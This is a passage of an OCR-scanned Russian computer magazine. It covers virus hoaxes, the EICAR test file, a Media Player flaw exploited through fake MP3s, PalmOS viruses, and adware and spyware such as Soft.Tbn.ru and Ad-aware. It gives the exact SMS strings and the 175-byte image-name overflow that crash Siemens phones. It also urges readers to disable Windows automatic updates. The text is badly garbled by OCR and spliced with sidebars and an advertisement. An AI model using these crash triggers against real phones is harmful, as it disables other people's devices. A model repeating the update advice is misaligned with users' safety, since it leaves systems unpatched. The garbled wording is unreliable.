в антивирусную базу. 


Засриксированы случаи построения целых 
сринансовых пирамид через почтовые 
сообщения. 
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"Счастливое письмо" - стандартная рассылка 


Тестовый файл, который поставляется с антивирусом 


Вирусные мистисикации 
распространяются чаще всего через 
электронную почту. 


Также существуют срайлы, которые оп- 
ределяются антивирусами, но не явля- 
ются заразными. Пример такой мистисри- 
Kaun - Есаг. Это 68-байтный комок, KO- 
торый выводит на экран строку EICAR- 
STANDARD-ANTIVIRUS-TEST-FILE! Его за- 
несли в базу лишь потому, что он необ- 
ходим для проверки работы антивируса 
и поставляется с ним в комплекте. 


МЫ ПОЙДЕМ ДРУГИМ ПУТЕМ! 
и Отдельно выделяются вирусы, 
имеющие нестандартные алгоритмы 

распространения. Совсем недавно 
выяснилось, что виндовый Media 
Player содержит багу, через которую 
можно было запускать локальные 
файлы. Вирмейкеры пронюхали это и 
написали чудесную тр3'шку, кото- 
рая юзала эту уязвимость. Выдавая 
свои композиции за популярные хи- 
ты, создатели вируса заставляли 
проигрыватель накручивать банне- 
ры на определенном ресурсе. Это 
происходило при запуске файла из- 
вестным проигрывателем. 


Как выяснилось, звуковой файл был 
простой подделкой. Композиция, со- 
держащая в себе звук и небольшой 

скрипт, позволяющий открывать 


Windows Media Player - очередной 
уязвимый продукт Microsoft 


большое число рориур-окошек, были 
сделаны в формате wma. Затем 
файл был переименован в тр3. Из- 
за того, что проигрыватель не обра- 
щает внимания на несоответствие 
расширений, становилось возмож- 
ным распространять этот вирус. Тео- 
ретически, через скрипт можно про- 
извести АсНуеХ-вызов и тем самым 
полностью завладеть системой. Что- 
бы избежать подобного заражения, 
необходимо либо использовать 
Winamp для проигрывания звукоза- 
писей (наилучший вариант), либо 
пропатчить продукт Microsoft. 


Это далеко не единственный диковин- 
ный способ передачи вирусов. Почи- 
тав тематические статьи в инете, ты 
удивишься многообразию способов 
распространения заразы. 


У МЕНЯ ЗАЗВОНИЛ ТЕЛЕФОН... 
ш После того, как компьютерные 
мистификации обрели некоторую по- 
пулярность, злоумышленники снова 
решили пошутить над незадачливыми 
ламерами в инете, только уже нес- 
колько по-другому. Теперь они наце- 
лились на сотовые телефоны. В 2000 
году по Сети ходило письмо о том, что 
телефоны марки Nokia и Motorola co- 
держат опасную уязвимость и могут 


быть легко выведены из строя опас- 
ным вирусом. При этом шутники ссы- 
лались на известные компании 
Sophos и intY, чтобы придать письму 
достоверность. В тексте письма нахо- 
дилось следующее предостережение: 
если вам поступил звонок и на экране 
появилась надпись "не существует" 
(именно она отображается, когда но- 
мер не определен), следует немедлен- 
но отклонить вызов и выключить те- 
лефон. В противном случае, в мобилу 
вселится якобы опасный вирус и сот- 
рет всю информацию с $!М-карты и из 
памяти трубы. При этом мобильник 
потеряет контакт с внешним миром, и 
его можно будет выбросить ;). Ну и, 
конечно, в приписке сказано о пере- 
сылке этого письма своим друзьям и 
знакомым. Как ты понял, эта обычная 
вирусная мистификация, и создана 
она для реализации двух целей: 


©. Массовое выключение телефонов. 

@. Спам-распространение. Именно 
эту задачу пытаются выполнять обыч- 
ные компьютерные мистификации. 


Теперь настало время подвести неко- 
торый итог. Вирусные мистификации 
распространяются чаще всего через 
электронную почту, содержат в себе 
описание нового опасного вируса на 
сложном техническом языке, наглые 
заявления о подтверждении сообще- 
ния известными компаниями, а также 
приписку о немедленном перенаправ- 
лении письма по всей адресной книге. 
Существовали случаи и комбиниро- 
ванной рассылки - к письму прилагал- 
ся аттач (руководство по излечению 
от заразы), который был заражен 
опасным вирусом. Естественно, запус- 
кать такие срайлы не стоит. 


ОТ МИФА К РЕАЛЬНОСТИ 

и "Неужели вирмейкеры ограничи- 
ваются одними мистификациями?" - 
спросишь ты. Вовсе нет, для мобиль- 
ников существуют и реальные вещи. 
Хотя тут следует оговориться, для мо- 
бильных телефонов вирусов еще не 
было. Но антивирусники уже фикси- 
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Письмо, сообщающее об опасном вирусе 


Ш Новейшую информацию о вирусах ты сможешь найти на 


различных сайтах антивирусных лабораторий. Их список по- 
добран на отличном проекте 
http://viruslist.com/compinfo.html. 


руют первые вредоносные програм- 
мы, угрожающие здоровью твоего мо- 
бильного друга. Один из них называл- 
ся SMS-Flooder и был написан неким 
HSE. Вирус соединялся с $М5$-гейтами 
Германии и слал через них несколько 
текстовых сообщений на случайный 
номер. Программа написана на Visual 
Basic 5.0 и представляет собой не- 


Пару лет 
назад по 
Сети гулял 
более npog- 
винутый 
псевдови- 
рус. Он го- 
ворил полу- 
чателю, что 
в его систе- 
ме обнару- 
жена зараза 
и ее стоит 
удалить. Но 
прежде чем 
это сделать, 
следует пе- 
реслать мы- 
ло макси- 
мальному 
количеству 
людей. Как 
ты, навер- 
ное, дога- 
дался, в 
письме про- 
сят стереть 
важную 
виндовую 
библиотеку, 
после чего 
работа в 
системе бу- 
дет невоз- 
можна. 


Существо- 
вали случаи 
и комбини- 
рованной 
рассылки - 
к письму 
прилагался 
аттач (ру- 
KOBOgCTBO 
по излече- 
нию от за- 
разы), ко- 
торый был 
заражен 
опасным 
вирусом. 
Естествен- 
но, запус- 
кать такие 
файлы не 
стоит. 


Антивирус- 
ники уже 
фиксируют 
первые вре- 
доносные 
программы, 
угрожаю- 
щие здо- 
ровью твое- 
го мобиль- 
ного друга. 
Один из них 
назывался 
SMS- 
Flooder u 
был напи- 
сан неким 
HSE. Вирус 
соединялся 
с $М$-гей- 
тами Герма- 
нии и слал 
через них 
несколько 
текстовых 
сообщений 
на случай- 
ный номер. 
Программа 
написана на 
Visual Basic 
5.04 
представля- 
ет собой не- 
большой 
скрипт. 


Тимофоника 
имеет 
схожие 
черты с 
вирусом 1 
Love You. 
Он также 
распростран 
яется через 
вложения в 
электронной 
почте и 
имеет вид 
\УВ-скрипта. 
Реальную 
опасность 
этот вирус 
представляе 
т только 
для 
жителей 
Испании, 
потому как 
флуд 
происходит 
только с 
местного 
гейта. 
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Вирус "Тимофоника" 


Многочисленные баги, связанные 
с переполнением буфера, были найдены 
в мобилах Siemens. 


большой скрипт. Для передачи SMS 
Flooder использует шлюзы 
www.mobildig.de, www.lycos.de и gpy- 
гие. Несмотря Ha то, что прога He мо- 
жет размножаться, а также не выпол- 
няет деструктивных действий, антиви- 
русы внесли ее в свои базы. Разра- 
ботчики утверждают - данный вирус 
может быть началом написания опас- 
ного троянца, и поэтому следует быть 
готовым ко всему. 


Примерно в это же время был на- 
писан вирус "Тимофоника". Он вы- 
полнял те же действия, что и SMS- 
Flooder, только уже в Испании. 
Вирь коннектился к известному 
гейту компании Мом! {аг и пересы- 
лал на случайный номер сообще- 
ние с текстом "Телефоника вас на- 
дувает!". Дело в том, что Телефо- 
ника - крупнейшая коммуникацион- 
ная фирма, а префикс "Тимо" озна- 
чает обман, надувательство. Види- 
мо кто-то решил сыграть с этой 
фирмой злую шутку. 


тием интернет-технологий, таких, как 
WAP, GPRS и др., подхватить вирус 
можно когда и где угодно. 


УЯЗВИМАЯ ПРОШИВКА 

и Методы активации вирусов также 
могут быть различными. Один из них - 
бреши в прошивках. Они регистриру- 
ются в Bugtraq и доступны каждому. 
Этим в основном страдают телефоны 
Nokia и Siemens. Радует лишь то, что 
прошивки постоянно обновляются и 
выкладываются для скачивания. Хотя 
простому юзеру иногда сложно обно- 
вить сост на своем мобильнике, поэ- 
тому прошивка в его аппарате являет- 
ся уязвимой. 


Многочисленные баги, связанные с 
переполнением буфера, были найде- 
ны в мобилах Siemens. Любая SMS, 
пришедшая на трубу, может убить те- 
necpou (спасти аппарат способна 
лишь перезагрузка). К примеру, если 
$М5-сообщение содержит строку 
"ENGLISH" (с кавычками) либо наз- 


Не пытайся тестировать подобные бреши 
со своего телефона Siemens - 
пострадаешь сам ;). 


Тимоффоника имеет схожие черты с 
вирусом | Love You. Он также распро- 
страняется через вложения в элект- 
ронной почте и имеет вид \В-скрипта. 
Реальную опасность этот вирус 
представляет только для жителей Ис- 
пании, потому как слуд происходит 
только с местного гейта. Bnocneg- 
ствии шлюзы были снабжены некото- 
рой защитой, которая была направле- 
на на фильтрацию вредоносных SMS. 


Сам вирь заражает компьютеры, но 
никак не сотовые телефоны. Kak я 
уже говорил, для мобильников зара- 
зы пока не обнаружено, но как утве- 
рждают знающие лючди, все движется 
к тому, что вирусы появятся. С разви- 
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Siemens под угрозой 


вание другого поддерживаемого язы- 
ка, телефон благополучно уходит в 
даун при попытке чтения SMS. Изба- 
виться от такой напасти можно путем 
апдейта прошивки, либо выбором 
другого аппарата ;). Существовал еще 
один способ для "продвинутых". Если 
выкинуть все неиспользуемые языки 
из софта мобилы, бага при получении 
SMS проявляться не будет. Вообще, 
суть уязвимости состоит в ошибке 
встроенного генератора, из-за нее 
софт полностью подвисает. 


Не так давно на www.void.ru появи- 
лось сообщение о более серьезной 
уязвимости в аппаратах Siemens. Ha 
этот раз буфер переполнялся после 
приема изображения. Дело в том, 
что при отправке графики использу- 
ется следующая конструкция: 
\"%IMG_NAME\". Причем, если заме- 
нить IMG_NAME на любую nocnego- 
вательность символов длиной 175 
байт, телефон загибается. Ему не по- 
может даже перезагрузка, после рес- 
тарта аппарат продолжает глючить 
при операциях с папкой входящих 
сообщений. Вместе со статьей пре- 
доставляется простенький эксплоит, 
с помощью которого можно реализо- 
вать уязвимость. 

Не пытайся тестировать подобные 
бреши со своего TeneqpoHa Siemens - 
пострадаешь сам ;). В случае, если 
гейты не ограничивают длину сооб- 
щения 160 символами, можешь отос- 
лать SMS через них. Хотя не факт, что 
шлюзы не фильтруют подобные вре- 
доносные мессаги. Уязвимыми счита- 
ются аппараты 35, 45 и 50 серии. Ос- 
тальные версии не разглашаются. 


Недавний баг в прошивке Nokia также 
вызвал панику среди владельцев мо- 
бильных телефонов. На этот раз уяз- 
вимость связана с функциями обра- 
ботки Vcards (визитные карточки, пе- 
редающиеся в виде SMS или через 
инфракрасный порт). Если передать 
подобную SMS, превосходящую по 
длине допустимое значение, аппарат 


№ = m 
Брешь в прошивке Nokia 


К СВЕДЕНИЮ: 


Ш чтобы не стать жертвой случайной заразы, следует регулярно 
обновлять прошивку своего мобильного телефона. Они, как прави- 


ло, выкладываются на сайты производителей аппарата. Например, 
на WwwW.my-siemens.com ты всегда найдешь свежие версии софта 


для своего мобильного друга. 


Вирусы для КПК - реальность! 


ет из него ресурсы CODE и DATA и за- 
меняет их своими. При этом все сис- 
темные приложения становятся нера- 
ботоспособными. 

©. PALM.Phage.963. Модификация 
ранее изложенного виря. Теперь 
при запуске зараженного файла, эк- 
ран компьютера принимает серый 
оттенок, и происходит перезагрузка 
КПК. При записи приложения через 
ИК-порт, оно будет вполне работос- 
пособно, но в случае повторного за- 
пуска появляется вышеописанная 
картина. 
3. PALM.Vapor. Троянская програм- 
ма, предназначенная специально 
для PalmOS. При первом запуске ви- 
рус прячет иконки всех приложений, 
как будто файлов не существует. На 
самом же деле они есть и появляют- 
ся после рестарта. 


Антивирусные лаборатории активно 
готовятся к возможному выходу опасных 
вирусов для КПК. 


зависает. Стандарт Vcards поддержи- 
вается сосфтварным ПО Microsoft 
Lotus. Уязвимости подвержены теле- 
фоны 6210. Баг найден известной 
американской компанией @stake. 


Как ты понимаешь, все эти бреши 
вдохновляют вирусописателей. Когда- 
нибудь и в России будут передавать- 
ся смертельные SMS. Через Сеть, ли- 
бо специальные гейты. 


КАРМАННИКИ ПОД ПРИЦЕЛОМ 

m Если в сотовых телефонах зараза 
пока не обжилась, то карманные 
компьютеры уже почувствовали на 
себе проявления вирусов. Новое се- 
мейство PALM заражает КПК и вы- 
полняет нехорошие действия на ми- 
никомпьютере. 


Пока вирусов три. Все они занесены в 
базу и детектятся антивирусом. Ко- 
ротко расскажу о каждом из них. 


©. PALM.Phage. Самый первый и 
очень опасный вирус для КПК. Попа- 
дая на компьютер, зараза использует 
служебные сфункции и библиотеки. 
Затем происходит поиск всех Pilot 
(.RPC) файлов в системе и последова- 
тельное их заражение. После получе- 
ния доступа к файлу зараза считыва- 


Встречались также мистификации, в 
которых говорилось о новом опасном 
вирусе, заражающем PalmOS. Tpagu- 
ционно, в письме просят переслать 
полученное сообщение всем знако- 
MbIM. 


АНТИВИРУСЫ HE ДРЕМЛЮТ 

ш Несмотря на то, что вирусы для 
КПК только начали появляться, в ан- 
тивирусных лабораториях задумались 
о новом программном обеспечении, 
которое ловит подобную заразу. 


Антивирус Касперского для PalmOS 
будет отличаться от традиционных 
продуктов. Программное обеспечение 
перехватывает все потоки данных, 
при помощи которых вирусы проника- 
ют на компьютер пользователя. Кро- 
ме того, в антивирусной программе су- 
ществует комплексный подход к про- 
цессу проверки КПК на предмет зара- 
зы. Он включает в себя следующее: 


1. Сканер для проверки мест хранения 
пользовательских срайлов. Может за- 
пускаться в определенное время по 
желанию юзера. 

2. Монитор-перехватчик, который ра- 
ботает по технологии HotSync. 

3. Еще один монитор, работающий по 
стандарту Веат. 


Кроме того, вместе с программой 
поставляется подробная вирусная 
энциклопедия, чтобы юзер знал, с 
чем имеет дело. Также имеется сис- 
тема меню и настройка опций, под- 
держивается цветной пользова- 
тельский интерфейс. 


В случае, когда программа обнаружи- 
вает вирус, пользователю выдается 
соответствующее сообщение и нес- 
колько вариантов (удалить, вылечить, 
пропустить). При возникновении 
спорных ситуаций, решение принима- 
ет опять же юзер, а не антивирус ;). 


Программное обеспечение Касперско- 
го для PalmOS совместимо с версиями 
операционок 2.*, 3.* и 4.* (использу- 
ется в компьютерах Palm Pilot, 
Handspring, Visor, Sony СНЕ, TRG Pro, 
Symbol, a также в смартфонах Kyoera 
и Samsung). Внутренняя архитектура 
программы разделяется на две части: 
антивирусное ядро и база данных. С 
применением базы, пользователь мо- 
жет легко обновлять ее через интер- 
нет и не беспокоиться о версии ядра. 
Что примечательно, софт требует все- 
го лишь 256 Кб памяти. 


Защитим карманные компьютеры 


И ЭТО ТОЛЬКО НАЧАЛО... 

и Как видишь, антивирусные лабо- 
ратории активно готовятся к возмож- 
ному выходу опасных вирусов для 
КПК. Это реальность, потому как на- 
чало было положено, а продолжить 
начатое не так сложно. Что касается 
сотовых телефонов, совсем скоро за- 
раза будет проживать в самом аппа- 
рате. Тут возможно саморазмноже- 
ние, например, через отосланные без 
ведома пользователя SMS. Мало того, 
что хозяин трубы попадает на боль- 
шие бабки, которые потратит на по- 
добные сообщения, так еще и будет 
являться распространителем заразы. 
Впрочем, это только предположения, 
и не сракт, что предсказанное сбудет- 
ся. Но в наше время нужно быть гото- 
вым ко всему... и-ы 


Если $М$- 
сообщение 
содержит 
строку 
"%ЕМб- 
Ы$Н" (с 
кавычками) 
либо назва- 
ние другого 
поддержи- 
ваемого 
языка, те- 
лефон бла- 
гополучно 
уходит в 
даун при 
попытке 


чтения 
SMS. 


Недавний 
баг в про- 
шивке Nokia 
также выз- 
вал панику 
среди вла- 
дельцев мо- 
бильных те- 
лефонов. На 
этот раз 
уязвимость 
связана с 
функциями 
обработки 
Усаг4$ (ви- 
зитные кар- 
точки, пе- 
редающиеся 
в виде SMS 
или через 
инфракрас- 
ный порт). 
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СМЕРТЬ 
ШПИОНАМ 


ADWARE/SPYWARE - ЧТО ЭТО ТАКОЕ И КОМУ И ЗАЧЕМ НУЖНО? 


апомню, что Freeware - 


бесплатный програм- 


мный продукт, а 


Shareware - условно- 

бесплатный, и так как в 
России не принято платить за програм- 
мное обеспечение, эти виды распрост- 
ранения программ самые массовые. 
Возникает естественный вопрос: какой 
прок программисту делиться результа- 
тами своего труда с нами - путешест- 
венниками по Сети? Может быть, из-за 
того, что они такие добрые или ради 
славы? Да!! Встречаются и такие бес- 
корыстные люди - но много ли их? Вот 
как раз для них и разработан принцип 
Adware. 
Adware (AD - общепринятая англ. аб- 
бревиатура для Advertising - реклама) - 
это вид интернет-маркетинга, заключа- 
ющийся во встраивании баннеров в 
freeware и shareware программы. Прог- 
рамма, в свою очередь, распространя- 
ется бесплатно, а труд программиста 
оплачивает рекламодатель. То есть 
юзер за право пользования програм- 
мой просматривает рекламу. 
Выигрывают все. Пользователь имеет 
бесплатную программу. Автор ПО полу- 
чает высокую прибыль. Рекламодатель 
получает возможность проводить эф- 
фективные рекламные кампании. 
Казалось бы - все здорово! Ты смот- 
ришь рекламу и за это бесплатно поль- 
зуешься программой, о написании кото- 
рой мог только мечтать. Время идет, и 
вскоре ты начинаешь задаваться воп- 
росом: "Почему я должен разглядывать 
эти совершенно не нужные мне банне- 
ры, да еще тратить на них свой тра- 
фик?" Если Tak - это значит, что ты CO3- 
рел для покупки своей любимой прог- 
раммы, и она будет уже без баннеров. 
Так, например, компания ReGet 
Software, являющаяся одной из перво- 
открывателей принципа adware, выпус- 
кает свою программу ReGet (использу- 
ется для скачки файлов) как бесплат- 
ную (free) - с баннерами, так и платную 
(рго) - без надоедливой рекламы. 
Статистика показывает, что количество 
пользователей бесплатной версии npe- 
вышает число обладателей ReGet Pro 
почти в 200 раз. Следовательно, 
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рис. Константин Комардин 


adware-nporpamMb! приобрели больше 
сторонников, чем противников, и терпе- 
ливых людей гораздо больше, чем го- 
товых расстаться со своими кровно на- 
житыми деньгами. 

Это значит, что встроенная в програм- 
му реклама никуда уже от нас не денет- 
ся, главное, чтобы баннеры станови- 
лись более дружелюбными, чтобы глаз 
радовался и душа пела при взгляде на 
них, а рука сама стремилась кликнуть 
на забавную картинку, которая так ми- 
ло улыбается тебе. 

Итак, что такое adware уже более или 
менее ясно. Но возможно, кого-то заин- 


тересует, как выдвинуть свою програм- 
му на общий рынок, чтобы с ней смогли 
познакомиться не только в узком кругу 
твоих родных и знакомых. 

На сайте http://soft.tbn.ru/ содержится 
исчерпывающая иноформация о TOM, 
как "встраивать рекламные баннеры в 
freeware и shareware программное 
обеспечение". 

А для тех, у кого сейчас нет возможнос- 
ти почитать первоисточник, я расскажу 
самое основное здесь, оставляя всю 
информацию в первоначальном виде, 
чтобы избежать в дальнейшем криво- 
толков и недопонимания. 


Soft.Tbn.ru - первая и единственная adware сеть в рунете. 
Adware сеть Soft.Tbn.ru срункционирует на базе действующей 
баннерной сети ТВМ (сейчас показывает 20 млн. баннеров в 
день). Специальный компонент SoftTBN.dll интегрируется в 
ПО, устанавливается на компьютер каждого пользователя и 
обеспечивает скачивание и показ баннеров. 

Рекламодатель оплачивает только клики, т.е. реальные пере- 
ходы пользователя на твой сайт. Автор ПО получает 50% ge- 
Her, выплаченных рекламодателем. 


КАК ЭТО РАБОТАЕТ 

В adware сети Soft.Tbn.ru участвуют следующие стороны: 
Рекламодатели. Заказывают и оплачивают рекламную кампа- 
нию. Предоставляют свои баннеры. Привлекают на свои сай- 
ты конечных пользователей. 
Авторы ПО. Разрабатывают свои программы, встраивают в 
них компонент SoftTBN.dll и распространяют полученный про- 
дукт. Получают долю прибыли от проведения рекламной кам- 
пании. 
Компания Агава. Привлекает рекламодателей и разработчи- 
ков ПО к участию в adware сети Soft.Tbn.ru. Разрабатывает, 
администрирует и обеспечивает работу баннерной сети ТВМ, 
adware сети Soft.Tbn.ru и компонента SoftTBN.dIl. Получает go- 
лю прибыли от проведения рекламной кампании. 
Конечные пользователи. Получают и используют програм- 
мные продукты со встроенным компонентом SoftTBN.dll. Кли- 
кают по баннерам и заходят на интересующие их сайты. 
В adware сети Soft.Tbn.ru задействованы следующие програ- 
ммные компоненты: 
BannerBank. Технология создания и управления Виртуальной 
Баннерной Сетью. 
ТВМ. Баннерная сеть компании Агава, построенная на техно- 
логии BannerBank. Обеспечивает регистрацию рекламодате- 
лей и управление баннерами. 
Серверная часть Soft.Tbn.ru. Набор управляющих скриптов, 
которые: 

ш обеспечивают регистрацию рекламодателей и авторов 
ПО в adware сети Soft.Tbn.ru; 

и принимают и обрабатывают запросы от компонента 
ЗоЙТВМ.а! и в ответ отдают баннеры из сети TBN; 

и обрабатывают клики, ведут подсчет статистики и денег. 
Компонент SoftTBN.dil. Компонент скачивания и показа бан- 
неров. Программный компонент, который интегрируется в 
каждую программу (участвующую в adware сети Soft.Tbn.ru) и 
устанавливается на компьютер каждого конечного пользова- 
теля (вместе с программой). Связывается через интернет (по 
протоколу HTTP) с сервером Soft.Tbn.ru, получает баннеры и 
параметры показа банеров и в процессе работы программы 
показывает баннеры. 

Последовательность шагов по работе adware сети Soft.Tbn.ru: 

Ф. Рекламодатель регистрируется в баннерной сети ТВМ и в 
системе Soft.Tbn.ru и помещает свои баннеры. 

@. Автор ПО регистрирует в системе Soft.Tbn.ru свое ПО, по- 
Лучает OT нас компонент SoftTBN.dll uv встраивает его в свою 
программу. 

®. Мы устанавливаем соответствие между баннерами и ПО. 

Ф. Конечный пользователь получает от автора ПО экземп- 
ляр программы (со встроенным компонентом SoftTBN.dll) и за- 
Пускает эту программу. 

Ф. В процессе работы сосфтины компонент SoftTBN.dIl свя- 
зывается через интернет с сервером Soft.Tbn.ru, получает 
баннеры, параметры показа баннеров и затем показывает их. 

@. Если конечного пользователя заинтересовал баннер, OH 
кликает по баннеру. После клика на компьютере пользовате- 
ля открывается окно веб-браузера и загружается сайт, соот- 
ветствующий данному баннеру, а на сервер Soft.Tbn.ru пере- 
дается информация о клике. 

Вот и все - теперь ты настоящий знаток adware индустрии, но 
в теме статьи звучало еще одно слово... да, действительно - 
небольшое, крохотное слово Spyware (от английского слова 
Spy - шпион). 

А это небольшое слово и есть самый большой подвох для 
любителей халявы. Из-за него и встречаются люди, которые 
говорят, что аЧ\/аге-программы - это опасно. 


ЧИТАЙ 
ВЫБИРАЙ 
СМОТРИ 
ВСЕ ФИЛЬМЫ HA DVD 
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ANS настройки 
помашнего инмотеатра 


Издание, предоставляющее информацию 
о содержании и качестве лицензионных 
ДиСНов ЧУ0, выпущенных в России за год! 


ТЕСТЫ И ОТРЫВНИ ИЗ ЛУЧШИХ ФИЛЬМОВ 
УЖЕ В ПРОДАЖЕ 


ВОСПОЛЬЗУЙТЕСЬ ВОЗМОЖНОСТЬЮ 
ПОДПИСАТЬСЯ НА 
“DVO-GUIDE™ 
ЧЕРЕЗ РЕДАНЦИЮ 
НУРНАЛА “TOTAL OVD" 


Подробности на сайте 
Www. До ам, ГЫ 
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Опасно! Но что же тут может быть опас- 
ного? Будучи рядовым пользователем 
ты не знаешь, как работает твоя люби- 
мая программа изнутри. Да, она делает 
все что ты хочешь - но может быть, она 
успевает и еще что-то смастерить? Да 
еще и кому-нибудь это отослать. При- 
КОЛЬНО? А если ты сам - создатель 
программулины, и тебе доподлинно из- 
вестен каждый завиток кода, то и для 
тебя заготовлен сюрприз - ты не зна- 
ешь принципа работы встроенного в 
твое детище баннера, причем не обяза- 
тельно чтобы что-то вредоносное при- 
сутствовало в теле самой программы - 
оно может храниться на сайте интерне- 
та. 

И получается, что на бедных пользова- 
телях могут наживаться не только рек- 
ламные компании, но и крупные 
Spyware компании, которые по cookies 
и History узнают, что и когда юзер лю- 
бит смотреть в интернете, разнюхивают 
все о его пристрастиях, адресах элект- 
ронной почты и паролях. 

Ты задумаешься - ну ладно, пароль уз- 
нать это одно, это можно понять - но за- 
чем крупной компании знать то, что мне 
нравится смотреть, зачем ей адрес мо- 
ей почты? Так вот, только крупной ком- 
пании и интересно, чем занимается 
каждый ее юзер, приобретший эту 
программку. Об этом круге людей скла- 
дывается определенное мнение, кото- 
poe будет учтено при раскрутке буду- 
щих проектов, и именно в это они ста- 
нут вкладывать свои денежки. 

Мелкой срирме нет смысла хранить дан- 
ные о сотне людей, тем более что за ко- 
роткий период времени они будут раз- 
мытые, нечеткие - для того чтобы по- 
нять пристрастия своих потенциальных 
клиентов, нужно потратить уйму време- 
Ни и денег - а они есть лишь у крупной 
конторы. 

Ты сможешь точно сказать - какие сай- 
ты за год ты посещал чаще всего, чте- 
нию каких из них уделил максимум вре- 
мени, на какие ссылки какого сайта кли- 
кал чаще, что любишь смотреть в суб- 
боту вечером, а что в понедельник с ут- 
ра? Я бы затруднился ответить на этот 
вопрос, а зру\маге-компания - НЕТ. 
Разработчики, создающие свободно 
распространяемое ПО, получают день- 
ги за то, что вставляют в свои програм- 
мы небольшие рекламные баннеры. Og- 
нако такая реклама неэффективна, ес- 
ли ее показывать наобум, ведь она мо- 
жет не заинтересовать пользователя, 
увидевшего ее. Гиганты рекламы пыта- 
ются решить эту проблему по-своему: 
они наблюдают за пользователем во 
время его серсринга в интернете и Ta- 
ким образом узнают о его интересах. 
Небольшие шпионские программы, ко- 
торые собирают данные о пользовате- 
ле и передают их на сервер поставщика 
рекламы, встраиваются в бесплатные и 
условно-бесплатные программы без ве- 
дома пользователя. Эти программы 
объединяет общий термин Spyware - 
"шпионское (или шпионящее)" програ- 
ммное обеспечение. 
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Это легально? К сожалению, да, иначе 
мы не увидели бы таких суперпопуляр- 
ных бесплатных программ, как Kazaa. И 
ведь в Kazaa действительно были мо- 
дули-шпионы, об этом уже писано-пе- 
реписано. Правда в конце мая 2003 
компания Sharman Networks опублико- 
вала на сайте пиринговой сети Kazaa 
заявление, в котором указала, что в од- 
ноименный срайлообменный клиент не 
будут включаться шпионские модули, 
собирающие инфрормацию о деятель- 
ности пользователя. 

Как утверждается в заявлении 
Sharman Networks, Kazaa Media Desktop 
- бесплатная программа, расходы Ha 
поддержку которой окупаются закон- 
ными методами, а именно, распростра- 
нением контента с соблюдением авто- 
рских прав, размещением рекламы и с 
помощью двух рекламных модулей сто- 
ронних производителей. 

Судя по количеству источников зара- 
ботка, пользователю от новой полити- 
ки "Kazaa без троянцев" легче He ста- 
нет. Скорее всего, Sharman Networks 
выступила с таким заявлением, чтобы 
поднять репутацию программы среди 
пользователей, так как многие, не же- 
лая, чтобы за ними устанавливали 
слежку, пользуются "взломанной" вер- 
сией клиента KaZaa Lite, в которой от- 
сутствуют и трояны, и реклама. 
Законность внедрения Spyware гаранти- 
рует, что пользователь программы, час- 
то даже сам не подозревая об этом, сог- 
лашается на слежку за собой. Когда ты 
ставишь новую программу - всегда ли 
ты читаешь лицензионное соглашение 
на право пользования ей? А ведь 
именно в нем и написано, что ты согла- 
шаешься участвовать в какой-нибудь 
рекламной акции, причем зачастую это 
написано так витиевато, что понять 
смысл какого-то отдельного абзаца бы- 
вает довольно сложно. Ну а для умных, 
как обычно, созданы две радио-кнопки 
- согласен или нет с данным соглашени- 
ем? Не согласен - извини, программа 
инсталлироваться не будет. 

Установил программу - поздравляю! Я 
надеюсь, ты не забыл указать имя сво- 
го почтового ящика? Если не забыл - то 
поздравляю еще раз - мало того, что 
ты, скорее всего, указал свои настоя- 
щие имя, сфамилию, отчество - ты еще и 
сам вписал адрес почты, которую ты ча- 
ще всего проверяешь. Теперь жди, о 
тебе не забудут и будут регулярно при- 
сылать приветственные письма. Все-та- 
ки нужно подытожить все возможности 
зрумаге-модулей, чтобы ты знал симп- 
томы заражения ими. 

Шпионы могут: 

- сканировать твой жесткий диск, иссле- 
дуя твой реестр и системные папки в 
поисках инорормации обо всем установ- 
ленном у тебя программном обеспече- 
нии; 

- следить за качеством связи и спосо- 
бом подключения; 

- следить за активностью в Сети: сле- 
дить за данными, которые ты вносишь 


в формы, что чаще посещаешь, что за- 
казываешь в онлайн-магазинах; 

- следить за твоими Cookies, содержа- 
щими регистрационную информацию, 
созданную при посещении любимых 
сайтов; 

- могут интегрироваться в твой почто- 
вый клиент, отослав активно посещае- 
мый тобой адрес создателю spyware, а 
себя - всем твоим друзьям из адресной 
книги; 

- следить за нажатиями клавиш, тща- 
тельно фиксируя каждое из них, запи- 
сывая все, что ты печатаешь, в тексто- 
вый срайлик, отосланный впоследствии 
кому надо. 

До сих пор нет никаких законов, запре- 
щающих использование модулей-шпи- 
OHOB. Тем более что зачастую их созда- 


Mindows Media Player во всей красе 


тели могут оправдаться тем, что это не 
шпион, а, наоборот, самый лучший друг, 
помогающий своему пользователю по 
мере возможности. Примером может 
служить все Ta же компания Microsoft, 
известная своей заботой о пользовате- 
ле. Ты используешь медиа-плеер? 

Если да, то ты должен знать, что каж- 
дый медиа-плеер имеет свой персо- 
нальный номер, и при посещении им 
сайта-производителя тебя обязательно 
идентифицируют. Если тебя это не тро- 
гает, и ты уверен, что пользуешься ли- 
цензионной версией плеера - то не о 
чем и волноваться. А вот если твое 
сераце затрепетало при мысли о том 
пиратском диске, с которого ставилось 
все, что только можно - то я советую те- 
бе отключить функцию идентификации 
во вкладке параметры, меню сервис. 


подозрительно 


Лучше обновим винды как-нибудь иначе 


Просто сними галочки с "разрешить веб- 
узлам идентификацию проигрывателя" и 
с "получать лицензии автоматически". 
Автообновление нужно отключить через 
вкладку свойства твоего компьютера. 
Там выбери автоматическое обновле- 
ние и установи галку на "отключить ав- 
томатическое обновление. Я хочу вы- 
полнять обновление программного 
обеспечения вручную". А еще лучше, 
запрети, с помощью какого-нибудь сра- 
ервола, своему любимому проигрыва- 
телю соединяться с интернетом, и мо- 
жешь спать спокойно. 

Теперь надо решить, как узнать, есть 
ли шпион в твоей любимой программе, 
и если есть, то как от него избавиться. 
Часто антивирус определяет програм- 
мы-шпионы как инфицированные, но 
не настолько часто, чтобы этому пол- 
ностью доверять. Поэтому любитель 
халявы должен запастись настоящей 
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Это то, что видят шпионы в своем 
кошмарном сне 


пушкой, которая не дает осечки З1 - не 
в лучшую сторону. 

Одной из самых популярных программ 
по истреблению spyware-mogynen явля- 
ется Ad-aware. 

Она абсолютно бесплатна и не содер- 
жит в себе вредоносного кода. Взять ее 
можно на сайте www.soft-portal.msk.ru/ 
или с родного сайта производителя 
www.lavasoft.de/. Как написано на сосрт- 
портале, "Ad-aware предназначена для 
поиска и правильного удаления spy- 
ware - следящего (шпионского) ПО, та- 
кого Kak Adware, AdvertBar, Alexa, 
Aureate, Cydoor, Doubleclick, Gator, 
Hotbar, SurfPlus, Web3000 и npou., уста- 
навливаемого Ha ПК пользователя раз- 
личными Ad-ware программами". Так 


оно и есть на самом деле. Эта програм- 
ма работает по принципу сканера, вы- 
